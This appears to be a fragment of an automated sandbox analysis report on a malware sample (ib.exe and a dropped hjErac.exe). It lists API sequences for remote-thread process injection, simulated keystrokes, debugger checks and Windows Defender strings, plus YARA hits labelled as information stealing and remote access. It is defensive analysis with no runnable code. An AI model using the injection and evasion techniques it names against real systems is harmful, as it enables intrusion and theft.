Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003E31A6
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E2CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_003E2CCC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E22C0 OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,GetLastError,GetLastError,_printf,WaitForSingleObject,CloseHandle, 0_2_003E22C0
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event, 0_2_003E1670
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event, 0_2_003E1670
Source: SciTE.exe.2.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E3444 cpuid 0_2_003E3444
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E3096 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_003E3096
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 2_2_00CB139F
Source: Amcache.hve.2.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR